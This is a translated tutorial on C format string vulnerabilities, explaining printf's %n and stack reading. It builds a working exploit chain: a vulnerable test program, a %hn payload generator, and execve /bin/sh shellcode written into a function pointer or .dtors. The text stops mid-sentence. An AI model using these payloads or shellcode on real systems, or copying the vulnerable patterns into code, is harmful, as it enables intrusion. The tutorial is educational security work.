Original in fr Frédéric Raynal, Christophe Blaess, Christophe Grenier
fr to en:Frédéric
en to en:Lorne Bailey
Christophe Blaess is an independent aeronautics engineer. He is a Linux fan and does much of his work on this system. He coordinates the translation of the man pages as published by the Linux Documentation Project.
Christophe Grenier is a 5th year student at the ESIEA, where he works as a sysadmin too. He has a passion for computer security.
Frédéric Raynal has been using Linux for many years because it doesn't pollute, it doesn't use hormones, MSG or animal by-products... only sweat and craft.
Most security flaws come from bad configuration or laziness. This rule holds true for format strings.
It is often necessary to use null terminated strings in a program. Where
inside the program is not important here. This vulnerabilty is
again about writing directly to memory. The data for the attack can come
from stdin
, files, etc.
A single instruction is enough:
printf("%s", str);
However, a programmer can decide to save time and six bytes while writing only:
printf(str);
With "economy" in mind, this programmer opens a
potential hole in his work. He is satisfied with passing a single
string as an argument, which he wanted simply to display without
any change. However, this string will be parsed to look for
directives of formatting (%d
, %g
...) .
When such a format character is discovered, the corresponding
argument is looked for in the stack.
We will start introducing the family of printf()
functions.
At least, we expect everyone knows them ... but not in detail, so
we will deal with the lesser known aspects of these routines. Then,
we will see how to get the necessary information to exploit such a
mistake. Finally, we will show how all this fits together with a
single example.
printf()
: they told me a lie !Let us start with what we all learned in our programming's handbooks: most of the input/output C functions use data formatting, which means that one has not only to provide the data for reading/writing, but also how it shold be displayed. The following program illustrates this:
/* display.c */ #include <stdio.h> main() { int i = 64; char a = 'a'; printf("int : %d %d\n", i, a); printf("char : %c %c\n", i, a); }Running it displays:
>>gcc display.c -o display >>./display int : 64 97 char : @ aThe first
printf()
writes the value of the integer
variable i
and of the character variable
a
as int
(this is done using
%d
), which leads for a
to display its
ASCII value. On the other hand, the second printf()
converts the integer variable i
to the corresponding
ASCII character code, that is 64.
Nothing new - everything conforms to the
many functions with a prototype similar to the
printf()
function :
const
char *format
) is used to specify the selected format;Most of our programming lessons stop there, providing a non
exhaustive list of possible formats (%g
,
%h
, %x
, the use of the dot character
.
to force the precision...) But, there is another one
never talked about:%n
. Here is what the
printf()
's man page says about it:
The number of characters written so far is stored into
the integer indicated by the int * (or variant)
pointer argument. No argument is converted. |
Here is the most important thing of this article: this argument makes it possible to write into a pointer variable , even when used in a display function !
Before continuing, let us say that this format also exists for
functions from the scanf()
and syslog()
family.
We are going to study the use and the behavior of this format
through small programs. The first, printf1
, shows a
very simple use:
/* printf1.c */ 1: #include <stdio.h> 2: 3: main() { 4: char *buf = "0123456789"; 5: int n; 6: 7: printf("%s%n\n", buf, &n); 8: printf("n = %d\n", n); 9: }
The first printf()
call displays the string
"0123456789
" which contains 10 characters. The next
%n
format writes this value to the variable
n
:
>>gcc printf1.c -o printf1 >>./printf1 0123456789 n = 10Let's slightly transform our program by replacing the instruction
printf()
line 7 with the following one:
7: printf("buf=%s%n\n", buf, &n);
Running this new program confirms our idea: the variable
n
is now 14, (10 characters from the buf
string variable added to the 4 characters from the
"buf=
" constant string, contained in the format string
itself).
So, we know the %n
format counts every character
that appears in the format string. Moreover, as we will demonstrate
the printf2
program, it counts even further:
/* printf2.c */ #include <stdio.h> main() { char buf[10]; int n, x = 0; snprintf(buf, sizeof buf, "%.100d%n", x, &n); printf("l = %d\n", strlen(buf)); printf("n = %d\n", n); }The use of the
snprintf()
function is to prevent from
buffer overflows. The variable n
should then be 10:
>>gcc printf2.c -o printf2 >>./printf2 l = 9 n = 100Strange ? In fact, the
%n
format considers the amount of
characters that should have been written.
This example shows that truncating due to the size specification is
ignored.
What really happens ? The format string is fully extended before being cut and then copied into the destination buffer:
/* printf3.c */ #include <stdio.h> main() { char buf[5]; int n, x = 1234; snprintf(buf, sizeof buf, "%.5d%n", x, &n); printf("l = %d\n", strlen(buf)); printf("n = %d\n", n); printf("buf = [%s] (%d)\n", buf, sizeof buf); }
printf3
contains some differences compared to
printf2
:
>>gcc printf3.c -o printf3 >>./printf3 l = 4 n = 5 buf = [0123] (5)The first two lines are not surprising. The last one illustrates the behavior of the
printf()
function :
00000\0
";x
in our example. The string then
looks like "01234\0
";sizeof buf - 1
bytes2 from this string is copied into the
buf
destination string, which give us
"0123\0
"GlibC
sources, and particularly vfprintf()
in the
${GLIBC_HOME}/stdio-common
directory.
Before ending with this part, let's add that it is possible to
get the same results writing in the format string in a slightly
different way. We previously used the format called
precision (the dot '.'). Another combination of formatting
instructions leads to an identical result: 0n
, where
n
is the the number width , and
0
means that the spaces should be replaced with 0
just in case the whole width is not filled up.
Now that you know almost everything about format strings, and
most specifically about the %n
format, we will study
their behaviors.
printf()
The next program will guide us all along this section to
understand how printf()
and the stack are related:
/* stack.c */ 1: #include <stdio.h> 2: 3: int 4 main(int argc, char **argv) 5: { 6: int i = 1; 7: char buffer[64]; 8: char tmp[] = "\x01\x02\x03"; 9: 10: snprintf(buffer, sizeof buffer, argv[1]); 11: buffer[sizeof (buffer) - 1] = 0; 12: printf("buffer : [%s] (%d)\n", buffer, strlen(buffer)); 13: printf ("i = %d (%p)\n", i, &i); 14: }This program just copies an argument into the
buffer
character array . We take care not to overflow some important
data (format strings are really more accurate than buffer
overflows ;-)
>>gcc stack.c -o stack >>./stack toto buffer : [toto] (4) i = 1 (bffff674)It works as we expected :) Before going further, let's examine what happens from the stack point of view while calling
snprintf()
at line 8.
Fig. 1 : the stack at the
beginning of snprintf() |
Figure 1 describes the state of the
stack when the program enters the snprintf()
function
(we'll see that it is not true ... but this is just to give you an idea of
what's happening). We don't care about the %esp
register. It is somewhere below the %ebp
register. As
we have seen in a previous article, the first two values located in
%ebp
and %ebp+4
contain the respective
backups of the %ebp
and %ebp+4
registers.
Next come the arguments of the function snprintf()
:
argv[1]
which
also acts as data.tmp
array of 4 characters , the 64 bytes of the variable
buffer
and the i
integer variable .
The argv[1]
string is used at the same time as
format string and data. According to the normal order of the
snprintf()
routine, argv[1]
appears
instead of the format string. Since you can use a format string
without format directives (just text), everything is fine :)
What happens when argv[1]
also contains
formatting ? ? Normally, snprintf()
interprets them as
they are ... and there is no reason why it should act differently !
But here, you may wonder what arguments are going to be used as
data for formatting the resulting output string. In fact,
snprintf()
grabs data from the stack! You can see that
from our stack
program:
>>./stack "123 %x" buffer : [123 30201] (9) i = 1 (bffff674)
First, the "123
" string is copied into
buffer
. The %x
asks
snprintf()
to translate the first value into
hexadecimal. From figure 1, this first
argument is nothing but the tmp
variable which
contains the \x01\x02\x03\x00
string. It is displayed
as the 0x00030201 hexadecimal number according to our little endian
x86 processor.
>>./stack "123 %x %x" buffer : [123 30201 20333231] (18) i = 1 (bffff674)
Adding a second %x
enables you to go higher in the
stack. It tells snprintf()
to look for the next 4
bytes after the tmp
variable. These 4 bytes are in
fact the 4 first bytes of buffer
. However,
buffer
contains the "123
" string, which
can be seen as the 0x20333231 (0x20=space, 0x31='1'...) hexadecimal
number. So, for each %x
, snprintf()
"jumps" 4 bytes further in buffer
(4 because
unsigned int
takes 4 bytes on x86 processor). This
variable acts as double agent by:
>>./stack "%#010x %#010x %#010x %#010x %#010x %#010x" buffer : [0x00030201 0x30307830 0x32303330 0x30203130 0x33303378 0x333837] (63) i = 1 (bffff654)
You can find an occasionally useful format when it is necessary
to swap between the parameters (for instance, while displaying date
and time). We add the m$
format, right after the
%
, where m
is an integer >0. It gives
the position of the variable to use in the arguments list (starting
from 1):
/* explore.c */ #include <stdio.h> int main(int argc, char **argv) { char buf[12]; memset(buf, 0, 12); snprintf(buf, 12, argv[1]); printf("[%s] (%d)\n", buf, strlen(buf)); }
The format using m$
enables us to go up where we want in the stack, as we could do using
gdb
:
>>./explore %1\$x [0] (1) >>./explore %2\$x [0] (1) >>./explore %3\$x [0] (1) >>./explore %4\$x [bffff698] (8) >>./explore %5\$x [1429cb] (6) >>./explore %6\$x [2] (1) >>./explore %7\$x [bffff6c4] (8)
The character \
is necessary here to protect the
$
and to prevent the shell from interpreting it. In the
first three calls we visit contents of the buf
variable.
With %4\$x
, we get the %ebp
saved register, and then with the next %5\$x
, the
%eip
saved register (a.k.a. the return address). The
last 2 results presented here show the argc
variable
value and the address contained in *argv
(remember
that **argv
means that *argv
is an
addresses array).
This example illustrates that the provided formats enable us to
go up within the stack in search of information, such as the return
value of a function, an address... However, we saw at the beginning
of this article that we could write using functions of the
printf()
's type: doesn't this look like a wonderful
potential vulnerability ?
Let's go back to the stack
program:
>>perl -e 'system "./stack \x64\xf6\xff\xbf%.496x%n"' buffer : [döÿ¿000000000000000000000000000000000000000000000000 00000000000] (63) i = 500 (bffff664)We give as input string:
i
variable address;%.496x
);%n
) which will
write into the given address.i
variable address
(0xbffff664
here), we can run the program twice and
change the command line accordingly. As you can note it,
i
has a new value :) The given format string and the
stack organization make snprintf()
look like :
snprintf(buffer, sizeof buffer, "\x64\xf6\xff\xbf%.496x%n", tmp, 4 first bytes in buffer);
The first four bytes (containing the i
address) are
written at the beginning of buffer
. The
%.496x
format allows us to get rid of the
tmp
variable which is at the beginning of the stack.
Then, when the formatting instruction is the %n
, the
address used is the i
's one, at the beginning of
buffer
. Although the precision required is
496, snprintf writes only sixty bytes at maximum (because the length
of the buffer is 64 and 4 bytes have already been written). The value
496 is arbitrary, and is just used to manipulate the "byte
counter". We have seen that the %n
format saves the
amount of bytes that should have been written. This value is
496, to which we have to add 4 from the 4 bytes of the
i
address at the beginning of buffer
.
Therefore, we have counted 500 bytes. This value will be written into the
next address found in the stack, which is the i
's
address.
We can go even further with this example. To change
i
, we needed to know its address ... but sometimes the
program itself provides it:
/* swap.c */ #include <stdio.h> main(int argc, char **argv) { int cpt1 = 0; int cpt2 = 0; int addr_cpt1 = &cpt1; int addr_cpt2 = &cpt2; printf(argv[1]); printf("\ncpt1 = %d\n", cpt1); printf("cpt2 = %d\n", cpt2); }
Running this program shows that we can control the stack (almost) as we want:
>>./swap AAAA AAAA cpt1 = 0 cpt2 = 0 >>./swap AAAA%1\$n AAAA cpt1 = 0 cpt2 = 4 >>./swap AAAA%2\$n AAAA cpt1 = 4 cpt2 = 0
As you can see, depending on the argument, we can change either
cpt1
, or cpt2
. The %n
format
expects an address, that is why we can't directly act on
the variables, ( i.e. using %3$n (cpt2)
or %4$n
(cpt1)
) but have to go through pointers. The latter are
"fresh meat" with enormous possibilities for modification.
egcs-2.91.66
and glibc-2.1.3-22
. However,
you probably won't get the same results on your own box. Indeed,
the functions of the *printf()
type change according
to the glibc
and the compilers do not carry out the
same operations at all.
The program stuff
highlights these differences:
/* stuff.c */ #include <stdio.h> main(int argc, char **argv) { char aaa[] = "AAA"; char buffer[64]; char bbb[] = "BBB"; if (argc < 2) { printf("Usage : %s <format>\n",argv[0]); exit (-1); } memset(buffer, 0, sizeof buffer); snprintf(buffer, sizeof buffer, argv[1]); printf("buffer = [%s] (%d)\n", buffer, strlen(buffer)); }
The aaa
and bbb
arrays are used as
delimiters in our journey through the stack. Therefore we know that
when we find 424242
, the following bytes will be in
buffer
. Table 1 presents the
differences according to the versions of the glibc and
compilers.
Tab. 1 : Variations around glibc | ||
---|---|---|
|
|
|
gcc-2.95.3 | 2.1.3-16 | buffer = [8048178 8049618 804828e 133ca0 bffff454 424242 38343038 2038373] (63) |
egcs-2.91.66 | 2.1.3-22 | buffer = [424242 32343234 33203234 33343332 20343332 30323333 34333233 33] (63) |
gcc-2.96 | 2.1.92-14 | buffer = [120c67 124730 7 11a78e 424242 63303231 31203736 33373432 203720] (63) |
gcc-2.96 | 2.2-12 | buffer = [120c67 124730 7 11a78e 424242 63303231 31203736 33373432 203720] (63) |
Next in this article, we will continue to use
egcs-2.91.66
and the glibc-2.1.3-22
, but
don't be surprised if you note differences on your machine.
While exploiting buffer overflows, we used a buffer to overwrite the return address of a function.
With format strings, we have seen we can go everywhere (stack, heap, bss, .dtors, ...), we just
have to say where and what to write for %n
doing the
job for us.
/* vuln.c */ #include <stdio.h> #include <stdlib.h> #include <string.h> int helloWorld(); int accessForbidden(); int vuln(const char *format) { char buffer[128]; int (*ptrf)(); memset(buffer, 0, sizeof(buffer)); printf("helloWorld() = %p\n", helloWorld); printf("accessForbidden() = %p\n\n", accessForbidden); ptrf = helloWorld; printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf); snprintf(buffer, sizeof buffer, format); printf("buffer = [%s] (%d)\n", buffer, strlen(buffer)); printf("after : ptrf() = %p (%p)\n", ptrf, &ptrf); return ptrf(); } int main(int argc, char **argv) { int i; if (argc <= 1) { fprintf(stderr, "Usage: %s <buffer>\n", argv[0]); exit(-1); } for(i=0;i<argc;i++) printf("%d %p\n",i,argv[i]); exit(vuln(argv[1])); } int helloWorld() { printf("Welcome in \"helloWorld\"\n"); fflush(stdout); return 0; } int accessForbidden() { printf("You shouldn't be here \"accesForbidden\"\n"); fflush(stdout); return 0; }
We define a variable named ptrf
which is a pointer
to a function. We will change the value of this pointer to run the
function we choose.
First, we must get the offset between the beginning of the vulnerable buffer and our current position in the stack:
>>./vuln "AAAA %x %x %x %x" helloWorld() = 0x8048634 accessForbidden() = 0x8048654 before : ptrf() = 0x8048634 (0xbffff5d4) buffer = [AAAA 21a1cc 8048634 41414141 61313220] (37) after : ptrf() = 0x8048634 (0xbffff5d4) Welcome in "helloWorld" >>./vuln AAAA%3\$x helloWorld() = 0x8048634 accessForbidden() = 0x8048654 before : ptrf() = 0x8048634 (0xbffff5e4) buffer = [AAAA41414141] (12) after : ptrf() = 0x8048634 (0xbffff5e4) Welcome in "helloWorld"
The first call here gives us what we need: 3 words (one word = 4
bytes for x86 processors) separate us from the beginning of the
buffer
variable. The second call, with
AAAA%3\$x
as argument, confirms this.
Our goal is now to replace the value of the initial pointer
ptrf
(0x8048634
, the address of the
function helloWorld()
) with the value
0x8048654
(address of accessForbidden()
).
We have to write 0x8048654
bytes (134514260 bytes in
decimal, something like 128Mbytes). All computers can't afford such a
use of memory ... but the one we are using can :) It last around 20
seconds on a dual-pentium 350 MHz:
>>./vuln `printf "\xd4\xf5\xff\xbf%%.134514256x%%"3\$n ` helloWorld() = 0x8048634 accessForbidden() = 0x8048654 before : ptrf() = 0x8048634 (0xbffff5d4) buffer = [Ôõÿ¿000000000000000000000000000000000000000000000000 00000000000000000000000000000000000000000000000000000000000000 0000000000000] (127) after : ptrf() = 0x8048654 (0xbffff5d4) You shouldn't be here "accesForbidden"
What did we do? We just provided the address of ptrf
(0xbffff5d4)
. The next format (%.134514256x
)
reads the first word from the stack, with a precision of 134514256
(we already have written 4 bytes from the address of
ptrf
, so we still have to write
134514260-4=134514256
bytes). At last, we write the
wanted value in the given address (%3$n
).
However, as we mentioned it, it isn't always possible to use
128MB buffers. The format %n
waits for a pointer to an
integer, i.e. four bytes. It is possible to alter its behavior to
make it point to a short int
- only 2 bytes - thanks
to the instruction %hn
. We thus cut the integer to
which we want to write two parts.
The largest writable size will
then fit in the 0xffff
bytes (65535 bytes). Thus in
the previous example, we transform the operation writing "
0x8048654
at the 0xbffff5d4
address" into
two successive operations : :
0x8654
in the 0xbffff5d4
address0x0804
in the
0xbffff5d4+2=0xbffff5d6
addressHowever, %n
(or %hn
) counts the total
number of characters written into the string. This number can only
increase. First, we have to write the
smallest value between the two. Then, the second formatting will
only use the difference between the needed number
and the first number written as precision. For instance in our example, the first
format operation will be %.2052x
(2052 = 0x0804) and
the second %.32336x
(32336 = 0x8654 - 0x0804). Each
%hn
placed right after will record the right amount of
bytes.
We just have to specify where to write to both %hn
.
The m$
operator will greatly help us. If we save the
addresses at the beginning of the vulnerable buffer, we just have
to go up through the stack to find the offset from the beginning of
the buffer using the m$
format. Then, both addresses will
be at an offset of m
and m+1
. As we use
the first 8 bytes in the buffer to save the addresses to overwrite,
the first written value must be decreased by 8.
Our format string looks like:
"[addr][addr+2]%.[val. min. - 8]x%[offset]$hn%.[val. max -
val. min.]x%[offset+1]$hn"
The build
program uses three arguments to create a format string:
/* build.c */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> /** The 4 bytes where we have to write are placed that way : HH HH LL LL The variables ending with "*h" refer to the high part of the word (H) The variables ending with "*l" refer to the low part of the word (L) */ char* build(unsigned int addr, unsigned int value, unsigned int where) { /* too lazy to evaluate the true length ... :*/ unsigned int length = 128; unsigned int valh; unsigned int vall; unsigned char b0 = (addr >> 24) & 0xff; unsigned char b1 = (addr >> 16) & 0xff; unsigned char b2 = (addr >> 8) & 0xff; unsigned char b3 = (addr ) & 0xff; char *buf; /* detailing the value */ valh = (value >> 16) & 0xffff; //top vall = value & 0xffff; //bottom fprintf(stderr, "adr : %d (%x)\n", addr, addr); fprintf(stderr, "val : %d (%x)\n", value, value); fprintf(stderr, "valh: %d (%.4x)\n", valh, valh); fprintf(stderr, "vall: %d (%.4x)\n", vall, vall); /* buffer allocation */ if ( ! (buf = (char *)malloc(length*sizeof(char))) ) { fprintf(stderr, "Can't allocate buffer (%d)\n", length); exit(EXIT_FAILURE); } memset(buf, 0, length); /* let's build */ if (valh < vall) { snprintf(buf, length, "%c%c%c%c" /* high address */ "%c%c%c%c" /* low address */ "%%.%hdx" /* set the value for the first %hn */ "%%%d$hn" /* the %hn for the high part */ "%%.%hdx" /* set the value for the second %hn */ "%%%d$hn" /* the %hn for the low part */ , b3+2, b2, b1, b0, /* high address */ b3, b2, b1, b0, /* low address */ valh-8, /* set the value for the first %hn */ where, /* the %hn for the high part */ vall-valh, /* set the value for the second %hn */ where+1 /* the %hn for the low part */ ); } else { snprintf(buf, length, "%c%c%c%c" /* high address */ "%c%c%c%c" /* low address */ "%%.%hdx" /* set the value for the first %hn */ "%%%d$hn" /* the %hn for the high part */ "%%.%hdx" /* set the value for the second %hn */ "%%%d$hn" /* the %hn for the low part */ , b3+2, b2, b1, b0, /* high address */ b3, b2, b1, b0, /* low address */ vall-8, /* set the value for the first %hn */ where+1, /* the %hn for the high part */ valh-vall, /* set the value for the second %hn */ where /* the %hn for the low part */ ); } return buf; } int main(int argc, char **argv) { char *buf; if (argc < 3) return EXIT_FAILURE; buf = build(strtoul(argv[1], NULL, 16), /* adresse */ strtoul(argv[2], NULL, 16), /* valeur */ atoi(argv[3])); /* offset */ fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf)); printf("%s", buf); return EXIT_SUCCESS; }
The position of the arguments changes according to whether the first value to be written is in the high or low part of the word. Let's check what we get now, without any memory troubles.
First, our simple example allows us guessing the offset:
>>./vuln AAAA%3\$x argv2 = 0xbffff819 helloWorld() = 0x8048644 accessForbidden() = 0x8048664 before : ptrf() = 0x8048644 (0xbffff5d4) buffer = [AAAA41414141] (12) after : ptrf() = 0x8048644 (0xbffff5d4) Welcome in "helloWorld"
It is always the same : 3. Since our program is done to explain
what happens, we already have all the other information we would
need : the ptrf
and accesForbidden()
addresses . We build our buffer according to these:
>>./vuln `./build 0xbffff5d4 0x8048664 3` adr : -1073744428 (bffff5d4) val : 134514276 (8048664) valh: 2052 (0804) vall: 34404 (8664) [Öõÿ¿Ôõÿ¿%.2044x%3$hn%.32352x%4$hn] (33) argv2 = 0xbffff819 helloWorld() = 0x8048644 accessForbidden() = 0x8048664 before : ptrf() = 0x8048644 (0xbffff5b4) buffer = [Öõÿ¿Ôõÿ¿00000000000000000000d000000000000000000000 000000000000000000000000000000000000000000000000000000000000000000 00000000] (127) after : ptrf() = 0x8048644 (0xbffff5b4) Welcome in "helloWorld"Nothing happens! In fact, since we used a longer buffer than in the previous example in the format string, the stack moved.
ptrf
has gone from 0xbffff5d4
to
0xbffff5b4
). Our values need to be adjusted:
>>./vuln `./build 0xbffff5b4 0x8048664 3` adr : -1073744460 (bffff5b4) val : 134514276 (8048664) valh: 2052 (0804) vall: 34404 (8664) [¶õÿ¿´õÿ¿%.2044x%3$hn%.32352x%4$hn] (33) argv2 = 0xbffff819 helloWorld() = 0x8048644 accessForbidden() = 0x8048664 before : ptrf() = 0x8048644 (0xbffff5b4) buffer = [¶õÿ¿´õÿ¿0000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000 0000000000000000] (127) after : ptrf() = 0x8048664 (0xbffff5b4) You shouldn't be here "accesForbidden"We won!!!
We have seen that format bugs allow us to write anywhere. So, we
will see now an exploitation based on the .dtors
section.
When a program is compiled with gcc
, you can find a
constructor section (named .ctors
) and a destructor
(named .dtors
). Each of these sections contains
pointers to functions to be carried out before
entering the main()
function and after exiting, respectively.
/* cdtors */ void start(void) __attribute__ ((constructor)); void end(void) __attribute__ ((destructor)); int main() { printf("in main()\n"); } void start(void) { printf("in start()\n"); } void end(void) { printf("in end()\n"); }Our small program shows that mechanism:
>>gcc cdtors.c -o cdtors >>./cdtors in start() in main() in end()Each one of these sections is built in the same way:
>>objdump -s -j .ctors cdtors cdtors: file format elf32-i386 Contents of section .ctors: 804949c ffffffff dc830408 00000000 ............ >>objdump -s -j .dtors cdtors cdtors: file format elf32-i386 Contents of section .dtors: 80494a8 ffffffff f0830408 00000000 ............We check that the indicated addresses match those of our functions (attention : the preceding
objdump
command gives the
addresses in little endian):
>>objdump -t cdtors | egrep "start|end" 080483dc g F .text 00000012 start 080483f0 g F .text 00000012 endSo, these sections contain the addresses of the functions to run at the beginning (or the end), framed with
0xffffffff
and 0x00000000
.
Let us apply this to vuln
by using the format
string. First, we have to get the location in memory of these
sections, which is really easy when you have the binary at hand ;-)
Simply use the objdump
like we did previously:
>> objdump -s -j .dtors vuln vuln: file format elf32-i386 Contents of section .dtors: 8049844 ffffffff 00000000 ........Here it is ! We have everything we need now.
The goal of the exploitation is to replace the address of a
function in one of these sections with the one of the functions we
want to execute. If those sections are empty, we just have to
overwrite the 0x00000000
which indicates the end of
the section. This will cause a segmentation fault
because the program won't find this 0x00000000
,
it will take the next value as the address of a function, which is
probably not true.
In fact, the only interesting section is the destructor section
(.dtors
): we have no time to do anything before the
constructor section (.ctors
). Usually, it is enough to
overwrite the address placed 4 bytes after the start of the section
(the 0xffffffff
):
0x00000000
;Let's go back to our example. We replace the
0x00000000
in section .dtors
, placed in
0x8049848=0x8049844+4
, with the address of the
accesForbidden()
function, already known
(0x8048664
):
>./vuln `./build 0x8049848 0x8048664 3` adr : 134518856 (8049848) val : 134514276 (8048664) valh: 2052 (0804) vall: 34404 (8664) [JH%.2044x%3$hn%.32352x%4$hn] (33) argv2 = bffff694 (0xbffff51c) helloWorld() = 0x8048648 accessForbidden() = 0x8048664 before : ptrf() = 0x8048648 (0xbffff434) buffer = [JH0000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000000000000000 000] (127) after : ptrf() = 0x8048648 (0xbffff434) Welcome in "helloWorld" You shouldn't be here "accesForbidden" Segmentation fault (core dumped)Everything runs fine, the
main()
helloWorld()
and then exit. The destructor is then
called. The section .dtors
starts with the address of
accesForbidden()
. Then, since there is no other real
function address, the expected coredump happens.
We have seen simple exploits here. Using the same principle
we can get a shell, either by passing the shellcode through
argv[]
or an environment variable to the vulnerable
program. We just have to set the right address (i.e. the address of
the eggshell) in the section .dtors
.
Right now, we know:
However, in reality, the vulnerable program is not as nice as the one in the example. We will introduce a method that allows us to put a shellcode in memory and retrieve its exact address (this means: no more NOP at the beginning of the shellcode).
The idea is based on recursive calls of the function
exec*()
:
/* argv.c */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> main(int argc, char **argv) { char **env; char **arg; int nb = atoi(argv[1]), i; env = (char **) malloc(sizeof(char *)); env[0] = 0; arg = (char **) malloc(sizeof(char *) * nb); arg[0] = argv[0]; arg[1] = (char *) malloc(5); snprintf(arg[1], 5, "%d", nb-1); arg[2] = 0; /* printings */ printf("*** argv %d ***\n", nb); printf("argv = %p\n", argv); printf("arg = %p\n", arg); for (i = 0; i<argc; i++) { printf("argv[%d] = %p (%p)\n", i, argv[i], &argv[i]); printf("arg[%d] = %p (%p)\n", i, arg[i], &arg[i]); } printf("\n"); /* recall */ if (nb == 0) exit(0); execve(argv[0], arg, env); }The input is an
nb
integer that the program will
recursively calle itself nb+1
times:
>>./argv 2 *** argv 2 *** argv = 0xbffff6b4 arg = 0x8049828 argv[0] = 0xbffff80b (0xbffff6b4) arg[0] = 0xbffff80b (0x8049828) argv[1] = 0xbffff812 (0xbffff6b8) arg[1] = 0x8049838 (0x804982c) *** argv 1 *** argv = 0xbfffff44 arg = 0x8049828 argv[0] = 0xbfffffec (0xbfffff44) arg[0] = 0xbfffffec (0x8049828) argv[1] = 0xbffffff3 (0xbfffff48) arg[1] = 0x8049838 (0x804982c) *** argv 0 *** argv = 0xbfffff44 arg = 0x8049828 argv[0] = 0xbfffffec (0xbfffff44) arg[0] = 0xbfffffec (0x8049828) argv[1] = 0xbffffff3 (0xbfffff48) arg[1] = 0x8049838 (0x804982c)
We immediately notice the allocated addresses for
arg
and argv
don't move anymore after the
second call. We are going to use this property in our exploit. We
just have to change our build
program slightly to make
it call itself before calling vuln
. So, we get the
exact argv
address, and the one of our shellcode.:
/* build2.c */ #include <stdio.h> #include <stdlib.h> #include <unistd.h> #include <string.h> char* build(unsigned int addr, unsigned int value, unsigned int where) { //Same function as in build.c } int main(int argc, char **argv) { char *buf; char shellcode[] = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b" "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd" "\x80\xe8\xdc\xff\xff\xff/bin/sh"; if(argc < 3) return EXIT_FAILURE; if (argc == 3) { fprintf(stderr, "Calling %s ...\n", argv[0]); buf = build(strtoul(argv[1], NULL, 16), /* adresse */ &shellcode, atoi(argv[2])); /* offset */ fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf)); execlp(argv[0], argv[0], buf, &shellcode, argv[1], argv[2], NULL); } else { fprintf(stderr, "Calling ./vuln ...\n"); fprintf(stderr, "sc = %p\n", argv[2]); buf = build(strtoul(argv[3], NULL, 16), /* adresse */ argv[2], atoi(argv[4])); /* offset */ fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf)); execlp("./vuln","./vuln", buf, argv[2], argv[3], argv[4], NULL); } return EXIT_SUCCESS; }
The trick is that we know what to call according to the number
of arguments the program received. To start our exploit, we just
give to build2
the address we want to write to and
the offset. We don't have to give the value anymore since it is
going to be evaluated by our successive calls.
To succeed, we need to keep the same memory layout
between the different calls of build2
and then
vuln
(that is why we call the build()
function, in order to use the same memory footprint):
>>./build2 0xbffff634 3 Calling ./build2 ... adr : -1073744332 (bffff634) val : -1073744172 (bffff6d4) valh: 49151 (bfff) vall: 63188 (f6d4) [6öÿ¿4öÿ¿%.49143x%3$hn%.14037x%4$hn] (34) Calling ./vuln ... sc = 0xbffff88f adr : -1073744332 (bffff634) val : -1073743729 (bffff88f) valh: 49151 (bfff) vall: 63631 (f88f) [6öÿ¿4öÿ¿%.49143x%3$hn%.14480x%4$hn] (34) 0 0xbffff867 1 0xbffff86e 2 0xbffff891 3 0xbffff8bf 4 0xbffff8ca helloWorld() = 0x80486c4 accessForbidden() = 0x80486e8 before : ptrf() = 0x80486c4 (0xbffff634) buffer = [6öÿ¿4öÿ¿000000000000000000000000000000000000000000000 000000000000000000000000000000000000000000000000000000000000000 00000000000] (127) after : ptrf() = 0xbffff88f (0xbffff634) Segmentation fault (core dumped)
Why didn't this work ? We said we had to build the exact copy of
the memory between the 2 calls ... and we didn't do it !
argv[0]
(the name of the program) changed. Our program
is first named build2
(6 bytes) and vuln
after (4 bytes). There is a difference of 2 bytes, which is exactly
the value that you can notice in the example above. The address
of the shellcode during the second call of build2
is
given by sc=0xbffff88f
but the content of
argv[2]
in vuln
gives
20xbffff891
: our 2 bytes. To solve this, it is enough
to rename our build2
to only 4 letters e.g
bui2
:
>>cp build2 bui2 >>./bui2 0xbffff634 3 Calling ./bui2 ... adr : -1073744332 (bffff634) val : -1073744156 (bffff6e4) valh: 49151 (bfff) vall: 63204 (f6e4) [6öÿ¿4öÿ¿%.49143x%3$hn%.14053x%4$hn] (34) Calling ./vuln ... sc = 0xbffff891 adr : -1073744332 (bffff634) val : -1073743727 (bffff891) valh: 49151 (bfff) vall: 63633 (f891) [6öÿ¿4öÿ¿%.49143x%3$hn%.14482x%4$hn] (34) 0 0xbffff867 1 0xbffff86e 2 0xbffff891 3 0xbffff8bf 4 0xbffff8ca helloWorld() = 0x80486c4 accessForbidden() = 0x80486e8 before : ptrf() = 0x80486c4 (0xbffff634) buffer = [6öÿ¿4öÿ¿0000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000 000000000000000] (127) after : ptrf() = 0xbffff891 (0xbffff634) bash$
Won again : that works much better that way ;-) The eggshell
is in the stack and we changed the address pointed to by
ptrf
to have it point to our shellcode. Of course, it
can happen only if the stack is executable.
But we have seen that format strings allow us to write anywhere
: let's add a destructor to our program in the section
.dtors
:
>>objdump -s -j .dtors vuln vuln: file format elf32-i386 Contents of section .dtors: 80498c0 ffffffff 00000000 ........ >>./bui2 80498c4 3 Calling ./bui2 ... adr : 134518980 (80498c4) val : -1073744156 (bffff6e4) valh: 49151 (bfff) vall: 63204 (f6e4) [ÆÄ%.49143x%3$hn%.14053x%4$hn] (34) Calling ./vuln ... sc = 0xbffff894 adr : 134518980 (80498c4) val : -1073743724 (bffff894) valh: 49151 (bfff) vall: 63636 (f894) [ÆÄ%.49143x%3$hn%.14485x%4$hn] (34) 0 0xbffff86a 1 0xbffff871 2 0xbffff894 3 0xbffff8c2 4 0xbffff8ca helloWorld() = 0x80486c4 accessForbidden() = 0x80486e8 before : ptrf() = 0x80486c4 (0xbffff634) buffer = [ÆÄ000000000000000000000000000000000000000000000000000 0000000000000000000000000000000000000000000000000000 0000000000000000] (127) after : ptrf() = 0x80486c4 (0xbffff634) Welcome in "helloWorld" bash$ exit exit >>
Here, no coredump
is created while quitting our
destructor. This is because our shellcode contains an
exit(0)
call.
In conclusion as a last gift, here is build3.c
that
